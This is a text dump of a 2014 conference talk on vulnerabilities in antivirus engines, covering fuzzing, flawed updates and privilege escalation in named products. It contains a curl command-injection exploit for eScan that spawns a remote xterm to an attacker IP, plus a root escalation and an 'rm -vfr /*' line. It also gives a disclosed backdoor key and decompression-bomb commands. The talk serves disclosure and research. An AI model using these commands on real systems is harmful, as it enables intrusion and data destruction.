SlideShare a Scribd company logo

Breaking Antivirus Software

โ€ข
โ€ข
R
rahmanprojectd
SoftwareTechnology
1 of 107
Download to read offline
Breaking Antivirus Software Joxean Koret, COSEINC SYSCAN 2014
Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
Antivirus products ๎€Š What is an Antivirus? Extracted from Wikipedia: ๎€Š โ€œAn antivirus is a software used to prevent, detect and remove malware such as computer virusesโ€. ๎€Š AV software can be focused in offering end- point protection (Workstation products) or file- server protection (Server products such as mail filters, SMB scanners, etc...). ๎€Š Overall, the general aim of an Antivirus is to offer a better level of protection than what the underlying operating system offers alone. ๎€Š And they often fail miserably...
Antivirus Engines ๎€Š Common features of AV engines: ๎€Š Written in C/C++. ๎€Š Signatures based engine + heuristics. ๎€Š On-access scanners. ๎€Š Command line/GUI on-demand scanners. ๎€Š Support for compressed file archives. ๎€Š Support for packers. ๎€Š Support for miscellaneous file formats. ๎€Š Advanced common features: ๎€Š Packet filters and firewalls. ๎€Š Drivers to protect the product, anti-rootkits, etc... ๎€Š Anti-exploiting toolkits.
Antivirus products, engines and bugs ๎€Š An antivirus engine is just the core, the kernel, of an antivirus product. ๎€Š Some antivirus engines are used by multiple products. ๎€Š For example, BitDefender is the most widely used antivirus kernel. It's used by many products like G-Data, QiHoo 360, eScan, F-Secure, etc... ๎€Š Most โ€œbigโ€ antivirus companies have their own engine but not all. And some companies, like F-Secure, integrate 3rd party engines in their products. ๎€Š In general, during this talk I will refer to AV engines, to the kernels, except when specified the word โ€œproductโ€. ๎€Š Also, unless specified as fixed, all bugs shown during this presentation are 0days.
Antivirus users ๎€Š What the average user of an antivirus thinks after installing his/her preferred AV engine: ๎€Š โ€œI'm safe because I use an antivirus productโ€. ๎€Š What some paranoid users of antivirus products thinks: ๎€Š โ€œI'm safe because I use various antivirus productsโ€. ๎€Š My opinion: ๎€Š Any software you install makes you a bit more vulnerable. AV engines are no exceptions. Just the opposite. ๎€Š ...
Attack surface ๎€Š Fact: installing an application in your computer makes you a bit more vulnerable. ๎€Š You just increased your attack surface. ๎€Š If the application is local: your local attack surface increased. ๎€Š If the application is remote: your remote attack surface increased. ๎€Š If your application runs with the highest privileges, installs kernel drivers, a packet filter and tries to handle anything your computer may do... ๎€Š Your attack surface dramatically increased.
Myths and reality ๎€Š Antivirus propaganda: ๎€Š โ€œWe make your computer safer with no performance penalty!โ€ ๎€Š โ€œWe protect against unknown zero day attacks!โ€. ๎€Š Reality: ๎€Š AV engines makes your computer more vulnerable with a varying degree of performance penalty. ๎€Š The AV engine is as vulnerable to zero day attacks as the applications it tries to protect from. ๎€Š And can even lower the operating system exploiting mitigations, by the way...
Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
Attacking antivirus engines ๎€Š AV engines, commonly, are written in non managed languages due to performance reasons. ๎€Š Almost all engines written in C and/or C++ with only a few exceptions, like the old MalwareBytes, written in VB6 (!?). ๎€Š It translates into buffer overflows, integer overflows, format strings, etc... ๎€Š Most AV engines installs operating system drivers. ๎€Š It translates into possible local escalation of privileges. ๎€Š AV engines must support a long list of file formats: ๎€Š Rar, Zip, 7z, Xar, Tar, Cpio, Ole2, Pdf, Chm, Hlp, PE, Elf, Mach-O, Jpg, Png, Bz, Gz, Lzma, Tga, Wmf, Ico, Cur... ๎€Š It translates into bugs in the parsers of such file formats.
Attacking antivirus engines ๎€Š AV engines need to support such large list of file formats quickly and even better than the vendor. ๎€Š If an exploit for a new file format appears, customer will ask for support for such files as soon as possible. The longer it takes, the higher the odds of losing a customer moving on to another vendor. ๎€Š The producer doesn't need to โ€œsupportโ€ malformed files. The AV engine actually needs to do so. ๎€Š The vendor needs to handle malformed files but only to refuse them as repairing such files is an open door for vulnerabilities. ๎€Š Example: Adobe Acrobat
Attacking antivirus engines ๎€Š Most (if not all...) antivirus engines run with the highest privileges: root or local system. ๎€Š If one can find a bug and write an exploit for the AV engine, (s)he just won root or system privileges. ๎€Š Sandboxes, virtual machines, etc... are extremely rare. ๎€Š Most antivirus engines updates via HTTP only protocols: ๎€Š If one can MITM the connection (for example, in a LAN) one can install new files and/or replace existing installation files. ๎€Š It often translates in completely owning the machine with the AV engine installed as updates are not commonly signed. Yes. They aren't. ๎€Š I will show later one of the many vulnerable products...
Attacking antivirus engines ๎€Š AV engines often offer on-access scanners and behaviour based heuristic engines. ๎€Š Such scanners are usually implemented in 3 different ways: ๎€Š A sandbox on top of the AV's Intel x86 emulator. Very slow but, also, very little odds to attack such component. ๎€Š A driver to monitor file creation/access as well as process behaviour communicating with a user-level component. There is space for a possible EoP. ๎€Š Injecting libraries in all user-processes and hooking special functions. The easiest way to implement heuristic engines. ๎€Š Often, such โ€œprotectionโ€ methods make things worst than not having an antivirus engine. ๎€Š I'll show later on why with some real vulnerabilities...
Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
Vulnerabilities in AV engines ๎€Š Started around end of July/beginning of August to find vulnerabilities, for fun, in AV engines. ๎€Š In my spare time, some hours from time to time. ๎€Š Found remote and local vulnerabilities in 14 AV engines or AV products. ๎€Š Most of them in the first 2 months. ๎€Š I tested ~17 engines (I think, I honestly do not remember). ๎€Š It says it all. ๎€Š I'll talk about some of the vulnerabilities I found. ๎€Š The following are just a couple of them...
AV engines vulnerabilities ๎€Š Avast: Heap overflow in RPM (reported, fixed and Bug Bounty paid) ๎€Š Avg: Heap overflow with Cpio (fixed...)/Multiple vulnerabilities with packers ๎€Š Avira: Multiple remote vulnerabilities ๎€Š BitDefender: Multiple remote vulnerabilities ๎€Š ClamAV:Infinite loop with a malformed PE (reported & fixed, patch available soon) ๎€Š Comodo: Heap overflow with Chm ๎€Š DrWeb: Multiple remote vulnerabilities ๎€Š ESET: Integer overflow with PDF/Multiple vulnerabilities with packers ๎€Š F-Prot: Heap overflows with multiple packers ๎€Š F-Secure: Multiple remote vulnerabilities (contacted, amazingly collaborative) ๎€Š Panda: Multiple local privilege escalations (reported and partially fixed) ๎€Š eScan: Remote command injection ๎€Š And many more...
Broken AV products... ๎€Š The list is interminable... but, using this list http://www.av-comparatives.org/av-vendors/ ๎€Š ...anything using a 3rd party engine which is not Vipre, Norman, Cyren or Agnitum. ๎€Š Examples: QiHoo 360, F-Secure, G-Data, eScan, Emsisoft, BullGuard, Immunet, etc... ๎€Š + all the AV products using the AV engines mentioned in the previous slide. ๎€Š + some rare AV products like BkAV.
How to find such vulnerabilities? ๎€Š I used initially a fuzzing testing suite of my own, Nightmare. ๎€Š http://www.joxeankoret.com/download/Nightmare-0.0.2.tar.gz ๎€Š I will eventually upload the code to GitHub.com ๎€Š Downloaded all the AV engines with a Linux version I was able to find. ๎€Š The core is always the same with the only exception of some heuristic engines. ๎€Š Also used some (dirty) tricks to run Windows only AV engines in Linux. ๎€Š Fuzzed the command line tool of each AV engine by simply using radamsa + the testing suite of ClamAV, many different EXE packers and some random file formats. ๎€Š Results: Dozens of remotely exploitable vulnerabilities. ๎€Š Also, I performed basic local and remote checks: ๎€Š ASLR, null ACLs, updating protocol, network services, etc...
Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
Fuzzing statistics ๎€Š A friend of mine convinced me to write a fuzzer and do a โ€œFuzzing explainedโ€ like talk for a private conference. ๎€Š Really simple fuzzing engine with a max. of 10 nodes. ๎€Š I'm poor... I cannot โ€œstart relatively small, with 300 boxesโ€ like Google people does. ๎€Š Used this fuzzing suite to fuzz various Linux based AV engines, those I was able to run and debug. ๎€Š For that talk I did fuzz/test the following ones: ๎€Š BitDefender, Comodo, F-Prot, F-Secure, Avast, ClamAV, AVG. ๎€Š Results...
ClamAV ๎€Š Only 1 non reproducible crash :( ๎€Š Ran for about 2 weeks. ๎€Š Only 1 DOS (found manually) ๎€Š 1 infinite loop with a malformed PE. ๎€Š Asked to remain silent until a public patch is published. ๎€Š Honestly, I was very surprised. ๎€Š It seems they use fuzzing. ๎€Š Well done guys!
F-Secure ๎€Š No crash at all. Only found 1 memory exhaustion bug with CPIO. ๎€Š Consumes up to 4GB of memory. ๎€Š I was sure I was doing something wrong and I verified it later on... ๎€Š Decided not to continue at that moment because it was too heavy and required root for debug.
Avast ๎€Š 5 different bugs. ๎€Š Some of them disappeared quickly... ๎€Š 1 of them seemed to be exploitable. ๎€Š RPM Support. Bug reported and fixed. ๎€Š This is one of the AV engines I fuzzed the most: ~1 month. ๎€Š They have a Bug Bounty! ๎€Š Only reason why I contacted them.
Comodo AV ๎€Š Only 5 crashes. ๎€Š 2 different bugs. ๎€Š 1 seems to be exploitable. ๎€Š Heap overflow with CHM files when uncompressing data... ๎€Š IMHO, it didn't fail more because they don't support anything...
F-Prot ๎€Š 4 different bugs. ๎€Š Only left for around 2/3 hours. ๎€Š The bugs seems to be all exploitables. ๎€Š Armadillo, PECompact, ASPack and Yoda's Protector unpackers. ๎€Š Crashes at memcpy coming from different paths...
AVG ๎€Š Hundred of crashes, fuzzed โ€œmanuallyโ€ :( ๎€Š It sends crash reports automatically :/ I hate you. ๎€Š It needs to be fed via STDIN. Annoying. ๎€Š 4 different bugs found. ๎€Š 2 of them seem to be exploitable. ๎€Š CPIO and XAR files support. ๎€Š 1st one fixed recently :/ ๎€Š XAR one still 0day.
BitDefender ๎€Š +1500 crashes. ๎€Š 7 different bugs. ๎€Š Most of them with EXE unpackers and EXE uncompressors. ๎€Š Thinstall and Shrinker, for example. ๎€Š 2 of them seems to be exploitable.
More about fuzzing AV engines ๎€Š Most AV engines are Windows only. ๎€Š However, we can still fuzz them in non Windows based environments (Linux requires less memory and disk). ๎€Š What I have done: ๎€Š Try to run it with Wine. If it works use WineDBG + GDB server and connect IDA or GDB to the target. ๎€Š If it doesn't work, reverse engineer the core engine and write a more simple wrapper for it. ๎€Š Very time consuming but the best option. ๎€Š ...
More about fuzzing AV engines ๎€Š AV engines take a long while loading the core. They need to load all the signatures, unpack/decrypt them in memory, etc... ๎€Š The solution: use in-memory fuzzing. ๎€Š Reverse engineer your favourite AV's core engine and find the functions where files are being scanned. ๎€Š Debug the target application with IDA and use the AppCall feature to call those functions with your own input. For example. ๎€Š You don't need to restart it again and again. Just wait for it to crash while continuously feeding fuzzed inputs. ๎€Š However, it may cause some false positives: ๎€Š Some files/buffers can be discarded at some point before that scanning routine.
Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
Exploiting AV engines ๎€Š What will be briefly covered: ๎€Š Remote exploitation. ๎€Š What will be not: ๎€Š Local exploitation of local user-land or kernel-land vulnerabilities. ๎€Š I have no knowledge about kernel-land, sorry. ๎€Š Later on, I will discuss some local vulnerability and give details about how to exploit it but it isn't kernel stuff and is too easy to exploit.
Exploiting AV engines ๎€Š Exploiting an AV engine is like exploiting any other client-side application. ๎€Š Is not like exploiting a browser or a PDF reader. ๎€Š Is more like exploiting an Office file format. ๎€Š Exploiting memory corruptions in client-side applications remotely can be quite hard nowadays due to ASLR. ๎€Š However, AV engines makes too many mistakes too often so, don't worry ;) ๎€Š ...
Exploiting AV engines ๎€Š In general, AV engines are all compiled with ASLR enabled. ๎€Š But it's common that only the core modules are compiled with ASLR. ๎€Š Not the GUI related programs and libraries, for example. ๎€Š Some libraries of the core of some AV engines are not ASLR enabled. ๎€Š Check your target/own product, there isn't only one ;)
Exploiting AV engines ๎€Š Even in โ€œmajorโ€ AV engines... ๎€Š ...there are non ASLR enabled modules. ๎€Š ...there are RWX pages at fixed addresses. ๎€Š ...they disable DEP. ๎€Š Under certain conditions, of course. ๎€Š The condition, often, is the emulator.
Exploiting AV engines ๎€Š The x86 emulator is a key part of an AV engine. ๎€Š It's used to unpack samples in memory, to determine the behaviour of an executable program, etc... ๎€Š Various AV engines create RWX pages at fixed addresses and disable DEP as long as the emulator is used. ๎€Š Very common. Does not apply to only some random AV engine. ๎€Š ...
Exploiting AV engines (more tips) ๎€Š By default, an AV engine will try to unpack compressed files and scan the files inside. ๎€Š A compressed archive file (zip, tgz, rar, ace, etc...) can be created with several files inside. ๎€Š The following is a common AV engines exploitation scenario: ๎€Š Send a compressed zip file. ๎€Š The very first file inside forces the emulator to be loaded and used. ๎€Š The 2nd one is the real exploit.
Exploiting AV engines ๎€Š AV engines implement multiple emulators. ๎€Š There are emulators for x86, AMD64, ARM, JavaScript, VBScript, โ€ฆ. in most of the โ€œmajorโ€ AV engines. ๎€Š The emulators, as far as I can tell, cannot be used to perform heap spraying, for example. But they expose a considerable attack surface. ๎€Š It's common to find memory leaks inside the emulators, specially in the JavaScript engine. ๎€Š They can be used to construct complex exploits as we have a programming interface to craft inputs to the AV engine.
Exploiting AV engines: Summary ๎€Š Exploiting AV engines is not different to exploiting other client-side applications. ๎€Š They don't have/offer any special self-protection. They rely on the operating system features (ASLR/DEP) and nothing else. ๎€Š And sometimes they even disable such features. ๎€Š There are programming interfaces for exploit writers: ๎€Š The emulators: x86, AMD-64, ARM, JavaScript, ... usually. ๎€Š Multiple files doing different actions each can be send in one compressed file as long as the order inside it is kept. ๎€Š Owning the AV engine means getting root or system in all AV engines I tested. There is no need for a sandbox escape, in general.
Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
Details about some vulnerabilities in AV engines and products... Extracted from http://theoatmeal.com/comics/grump Copyright ยฉ Matthew Inman
Disclaimer ๎€Š I'm only showing a couple of my vulnerabilities. ๎€Š I have the bad habit of eating 3 times a day... ๎€Š I contacted 5 vendors for different reasons: ๎€Š Avast. They offer a Bug Bounty. Well done guys! ๎€Š ClamAV. Their antivirus is Open Source. ๎€Š Panda. I have close friends there. ๎€Š Ikarus, ESET and F-Secure. They contacted me an asked for help nicely. ๎€Š I do not โ€œresponsiblyโ€ contact multi-million dollar companies. ๎€Š I don't give my research for free. ๎€Š Audit your products...
Local Escalation of Privileges
Example: Panda Multiple local EoPs ๎€Š In the product Global Protection 2013 there are various processes running as SYSTEM. ๎€Š Two of those processes have a NULL process ACL: ๎€Š WebProxy.EXE and SrvLoad.EXE ๎€Š We can use CreateRemoteThread to inject a DLL, for example. ๎€Š Two very easy local escalation of privileges. ๎€Š But the processes are โ€œprotectedโ€ by the shield.
Example: Panda Multiple local EoPs ๎€Š Another terrible bug: The Panda's installation directory have write privileges for all users. ๎€Š However, again, the directory is โ€œprotectedโ€ by the shield... ๎€Š What is the fucking shield? ๎€Š ...
Example: Panda Multiple local EoPs ๎€Š The Panda shield is a driver that protects some Panda owned processes, the program files directory, etc... ๎€Š It reads some registry keys to determine if the shield is enabled or disabled. ๎€Š But... the registry key is world writeable. ๎€Š Also, it's funny, but there is a library (pavshld.dll) with various exported functions... ๎€Š ...
Example: Panda Multiple local EoPs ๎€Š All exported functions contains human readable names. ๎€Š All but the 2 first functions. They are called PAVSHLD_001 and 002. ๎€Š Decided to reverse engineer them for obvious reasons... ๎€Š The 1st function is a backdoor to disable the shield. ๎€Š It receives only 1 argument, a โ€œsecret keyโ€ (GUID): ๎€Š ae217538-194a-4178-9a8f-2606b94d9f13 ๎€Š If the key is correct, then the corresponding registry keys are written. ๎€Š Well, is easier than writing yourself the registry entries...
MOAR PANDAZ ๎€Š There are more stupid bugs in this AV engine... ๎€Š For example, no library is compiled with ASLR enabled. ๎€Š One can write a reliable exploit for Panda without any real big effort. ๎€Š And, also, one can write an exploit targeting Panda Global Protection users for any program. ๎€Š Why? Because the product injects 3 libraries without ASLR enabled in all processes. Yes.
Panda ๎€Š I reported the vulnerabilities because I have friends there. ๎€Š Some of them are (supposedly) fixed, others not... ๎€Š The shield backdoor. ๎€Š The permissions of the Panda installation directory. ๎€Š The injection of non randomized libraries bug that allows writing targeted exploits remains... ๎€Š Also, during my latest testing of their very last version, other local vulnerabilities appeared...
ASLR related (Address Space Layout Randomization)
ASLR disabled ๎€Š We already discussed that Panda Global Protection doesn't enable ASLR for all modules. ๎€Š Do you believe this is an isolated problem of just one antivirus product? ๎€Š As it is common with antivirus products/engines, such problems are not specific...
One example...
Forticlient ๎€Š The process av_task.exe is the actual AV scanner...
Forticlient ๎€Š Most libraries and binaries in Forticlient doesn't have ASLR enabled. ๎€Š Exploiting Forticlient with so many non ASLR enabled modules once a bug is found is trivial. ๎€Š You may think that this is a problem that doesn't happen to the โ€œbigโ€ ones... ๎€Š Think again.
2 random AVs nobody uses...
Kaspersky ๎€Š Libraries avzkrnl.dll and module vlns.kdl, a vulnerability scanner (LOL), are not ASLR enabled. ๎€Š One can write a reliable exploit for Kaspersky AV without any real effort.
BitDefender ๎€Š It's kind of easier to write an exploit for BitDefender... โ€œSecurity serviceโ€ my ass...
BKAV ๎€Š BKAV is a Vietnamese antivirus product. ๎€Š Gartner recognizes it as a โ€œCool vendor in Emerging Marketsโ€. ๎€Š I recognize it as a โ€œCool antivirus for writing targeted exploitsโ€...
BKAV ๎€Š They don't have ASLR enabled for their services...
BKAV ๎€Š And, like Panda, they inject a non ASLR enabled library system wide, the Bkav โ€œfirewallโ€ engine... ๎€Š ...miserably failing at securing your computer.
AV developers writing security software
Remote Denial of Service
Examples: ClamAV DOS ๎€Š There is a bug in ClamAV scanning some resource directory in PE files. ๎€Š I have been asked to wait until there is a public patch. ๎€Š It's fixed in their private repository but the patch is big so it needs some proper testing. ๎€Š Sorry, I cannot give all the details yet :( ๎€Š Found via dumb ass fuzzing. ๎€Š Reported. Because it's Open Source... ๎€Š https://bugzilla.clamav.net/show_bug.cgi?id=10650 ๎€Š The vulnerability was nicely handled by the ClamAV team (now Cisco).
Decompression bombs (multiple AVs) ๎€Š Do you remember them? If I remember correctly, the 1st discussion in Bugtraq about it was in 2001. ๎€Š A compressed file with many compressed files inside or with really big files inside. ๎€Š It can be considered a remote denial of service. ๎€Š Do you think AV engines are not vulnerable any more to such bugs with more than +10 years? ๎€Š In this case, you're wrong. ๎€Š Look to the following table....
Failing AVs ZIP GZ BZ2 RAR 7Z ESET X (***) X (***) BitDefender X Sophos X (*) X X X Comodo X AVG X Ikarus X Kaspersky X (**) * Sophos finishes after ~30 seconds. In a โ€œtestingโ€ machine with 16 logical CPUs and 32 GB of RAM. ** Kaspersky creates a temporary file. A 32GB dumb file is a ~3MB 7z compressed one. *** In my latest testing, ESET finishes after 1 minute with each file in my โ€œsmall testing machineโ€.
Decompression bombs: How to ๎€Š To create a simple decompression bomb in Unix issue the following commands: $ truncate -s 8589934592 dumb # 8GB $ 7z/gzip/bzip2/rar/lcab/compress/xxx dumb ๎€Š That's all. The result file is always less than 10 MB. ๎€Š I couldn't believe that still nowadays antivirus engines failed at this trivial โ€œattackโ€ when I โ€œdiscoveredโ€ this...
BitDefender engine ๎€Š BitDefender is a Romanian antivirus engine. ๎€Š Their AV core is the most widely distributed AV engine in other AV products. ๎€Š To name a few: F-Secure, G-Data, QiHoo 360, eScan, LavaSoft, Immunet, ... ๎€Š It suffers from a number of vulnerabilities like almost all other AV engines/products out there. ๎€Š Finding vulnerabilities in this engine is trivial. ๎€Š An easy example...
BitDefender bugs ๎€Š Modifying 2 DWORDs in a PE file packed with Shrinker3 packer will make it to crash: ๎€Š Those bytes are used to calculate the file and sections alignment of the new, in memory, unpacked PE file. ๎€Š When set to 0xFFFFFFFF and 0xFFFFFFF, both file and sections alignment will be set to 0...
BitDefender bugs ๎€Š ...and their values will be used, later on, in some arithmetic operations: ๎€Š Those 2 bugs are trivial to discover.
BitDefender notes ๎€Š This and all BitDefender's bugs don't affect exclusively BitDefender's products. ๎€Š It affects many AV products out there as previously mentioned. ๎€Š Adding a new AV engine to your product may sound โ€œcoolโ€ but you're making 3rd party bugs yours. ๎€Š And, by the way, you didn't audit it before adding to your product... ๎€Š Otherwise, I doubt you would have added it.
ESET Nod32 ๎€Š ESET Nod32 is a Slovak AV engine. ๎€Š Like most AV engines it suffers from a number of vulnerabilities that can be trivially discovered. ๎€Š One little example: a malformed PDF file. ๎€Š A negative or big value for any element of a /W(idth) element with arrays will make it to crash. ๎€Š A simple remote denial of service.
ESET Nod32 bug with PDF files ๎€Š According to ESET sources they use fuzzing as part of QA. ๎€Š I think they are not doing it very well... ๎€Š Finding this bug is trivial, like all the ones I previously shown.
F-Secure ๎€Š F-Secure is an antivirus from Finnland. ๎€Š They use 2 AV engines: their own one and the BitDefender's one. ๎€Š So, the previous bug, the BitDefender's one, also affects this AV product. ๎€Š Like with the whole majority of AV engines out there, there are rather easy to discover bugs in their (own) engine. ๎€Š Let's see a simple vulnerability they fixed in February.
F-Secure bug with InnoSetup ๎€Š There was a little bug handling some InnoSetup installers. Bug is at InnoDecoder::IsInnoNew(). ๎€Š A size for a call to FMalloc can be controlled:
F-Secure bug with InnoSetup ๎€Š A negative size will make malloc to fail but it will anyway memset the buffer... ๎€Š Basically, memset(NULL, '0', negative_size). ๎€Š Another bug trivial to discover by any means.
Proof of concepts ๎€Š Proof of concepts for the last discussed bugs can be downloaded from here: ๎€Š http://www.joxeankoret.com/download/3ea0506f0e583c ๎€Š Shortened URL: ๎€Š http://x90.es/7Lm
Remote Code Execution
DrWeb antivirus ๎€Š DrWeb is a Russian antivirus. Used, for example, by the largest bank (Sberbank) and the largest search engine in Russia (Yandex) + the Duma, to name a few customers. ๎€Š More of their propaganda:
DrWeb updating protocol ๎€Š DrWeb updates via HTTP only. They do not use SSL/TLS. ๎€Š It downloads a catalog file first: ๎€Š Example for Linux: ๎€Š http://<server>/unix/700/drweb32.lst.lzma ๎€Š In the catalog file there is a number of updatable files + a hash for them: ๎€Š VDB files (Virus DataBases). ๎€Š DrWeb32.dll. ๎€Š The hash is, actually, CRC32 and no component is signed, even the DrWeb32.dll library.
DrWeb updating protocol ๎€Š The โ€œhighest grade of certificateโ€ requires the highest grade of check for their database files and libraries: CRC32. โ€œHigh standardsโ€. ๎€Š To exploit in a LAN intercept the following domains: ๎€Š update.nsk1.drweb.com ๎€Š update.drweb.com ๎€Š update.msk.drweb.com ๎€Š update.us.drweb.com ๎€Š update.msk5.drweb.com ๎€Š update.msk6.drweb.com ๎€Š update.fr1.drweb.com ๎€Š update.us1.drweb.com ๎€Š update.nsk1.drweb.com ๎€Š ...and replace drweb32.dll with your โ€œmodifiedโ€ (lzma'ed) version.
DrWeb updating protocol ๎€Š Exploiting it is rather easy with ettercap and a quick Python web server + Unix lzma tool. ๎€Š You only need to calculate the CRC32 checksum and compress (lzma) the drweb32.dll file. ๎€Š I tested the bug under Linux: full code execution is possible. ๎€Š Though you need to be in a LAN to be able to do so, obviously. ๎€Š In my opinion, this updating protocol is horrible.
eScan for Linux ๎€Š eScan is an AV product from USA (MicroWorld Technologies). ๎€Š I was bored some random night in Singapore and found that the eScan product have a Linux version. ๎€Š I downloaded and installed it (~1 hour because of the awful hotel's connection). ๎€Š Then I started checking what it installs, finding for SUID binaries, etc... ๎€Š They use BitDefender and ClamAV engines, they don't have their own engine so, no need to test the scanners. ๎€Š I already had vulnerabilities for such engines... ๎€Š They install a Web server for management and a SUID binary called: ๎€Š /opt/MicroWorld/sbin/runasroot
eScan for Linux ๎€Š The SUID binary allows to execute root commands to the following users: ๎€Š root ๎€Š mwconf (created during installation). ๎€Š The eScan management application (called MwAdmin) is so flawed I decided to stop at the first RCE... ๎€Š A command injection in the login form (PHP). ๎€Š In a โ€œsecurityโ€ product. ๎€Š Yes.
eScan for Linux login page
eScan for Linux remote root ๎€Š This specific bug requires to know/guess an existing user. Not so hard. ๎€Š The user name and the password are used to construct an operating system command executed via the PHP's function โ€œexecโ€. ๎€Š I was not able to inject in the user name. ๎€Š But I was able to inject in the password. ๎€Š ...
Source code of login.php (I)
Source code of login.php (II) ๎€Š The password sent by the user is passed to check_user: ๎€Š There are some very basic checks against the password. ๎€Š Specially for shell escape characters. ๎€Š But they forgot various other characters like ';'.
Source code of common_functions.php ๎€Š Then, the given password is used in the function check_user like this:
eScan for Linux RCE ๎€Š My super-ultra-very-txupi-complex exploit for it: $ xhost + $ curl โ€“data "product=1&uname=valid@user.com&pass=1234567; DISPLAY=YOURIP:0;xterm;" http://target:10080/login.php ๎€Š Once you're in, run this to escalate privileges: $ /opt/MicroWorld/sbin/runasroot /usr/bin/xterm ๎€Š Or anything else you want... $ /opt/MicroWorld/sbin/runasroot rm -vfr /*
Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
Conclusions ๎€Š In general, AV software... ๎€Š ...doesn't make you any safer against skilled attackers. ๎€Š ...increase your attack surface. ๎€Š ...make you more vulnerable to skilled attackers. ๎€Š ...are as vulnerable to attacks as any other application. ๎€Š Some AV software... ๎€Š ...may lower your operating system protections. ๎€Š ...are plagued of both local and remote vulnerabilities. ๎€Š Some AV companies... ๎€Š ...don't give a fuck about security in their products.
Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
Recommendations for AV users ๎€Š Do not blindly trust your AV product. ๎€Š BTW, do not trust your AV product. ๎€Š Also, do not trust your AV product. ๎€Š Nope. I cannot stress it enough. ๎€Š Isolate the machines with AV engines used for gateways, network inspection, etc... ๎€Š Audit your AV engine or ask a 3rd party to audit the AV engine you want to deploy in your organization.
Recommendations for AV companies ๎€Š Audit your products: source code reviews & fuzzing. ๎€Š No, AV comparatives and the like are not even remotely close to this. ๎€Š Running a Bug Bounty, like Avast, is a very good idea too. ๎€Š Do not use the highest privileges possible for scanning network packets, files, etc... ๎€Š You don't need to be root/system to scan a network packet or a file. ๎€Š You only need root/system to get the contents of that packet or file. ๎€Š Send the network packet or file contents to another, low privileged or sandboxed, process.
Recommendations for AV companies ๎€Š Run dangerous code under an emulator, vm or, at the very least, in a sandbox. I only know 2 AVs using this approach. ๎€Š Dangerous code: file parsers written in C/C++ code. ๎€Š If one finds a vulnerability and it's running inside an emulator/sandbox one needs also an escape vulnerability to completely own the AV engine. ๎€Š Why is it harder to exploit browsers or document readers than security products? ๎€Š Another option could be to use a โ€œsaferโ€ language. Some AV products, actually, are doing this: Using Lua, for example. ๎€Š Do not trust your own processes. They can be owned. ๎€Š I'm not talking about signing the files. ๎€Š I'm talking about your AV's running processes.
Recommendations for AV companies ๎€Š Do not use plain HTTP for updating your product. ๎€Š Use SSL/TLS. ๎€Š Also, digitally sign all files. ๎€Š No, CRC is not a signature. Really. ๎€Š ...and verify there is nothing else after the signature.
Recommendations for AV companies ๎€Š Drop old code that is of no use today or make this code not available by default. ๎€Š Code for MS-DOS era viruses, packers, protectors, etc... ๎€Š Parsers for file format vulnerabilities in completely unsupported products nowadays. ๎€Š Such old code not touched in years is likely to have vulnerabilities. ๎€Š This is up to you: what do you prefer? Fail at stupid AV comparatives (AV-Test, anyone?) not detecting viruses from the Jurassic or have a more secure product?
Questions?

Recommended

The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage FuzzerThe Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage FuzzerJoxean Koret
ย 
2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoret2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoretKarel Javลฏrek
ย 
Richard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzingRichard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzingPacSecJP
ย 
Breaking av software
Breaking av softwareBreaking av software
Breaking av softwareThomas Pollet
ย 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzingG Prachi
ย 
BeStorm Introduction
BeStorm IntroductionBeStorm Introduction
BeStorm IntroductionAmit Shirolkar
ย 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkTom Eston
ย 
Antivirus test-wholedynamic2010
Antivirus test-wholedynamic2010Antivirus test-wholedynamic2010
Antivirus test-wholedynamic2010nuttakorn nakkerd
ย 

Recommended

The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage FuzzerThe Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
The Nightmare Fuzzing Suite and Blind Code Coverage FuzzerJoxean Koret
ย 
2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoret2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoretKarel Javลฏrek
ย 
Richard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzingRichard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzingPacSecJP
ย 
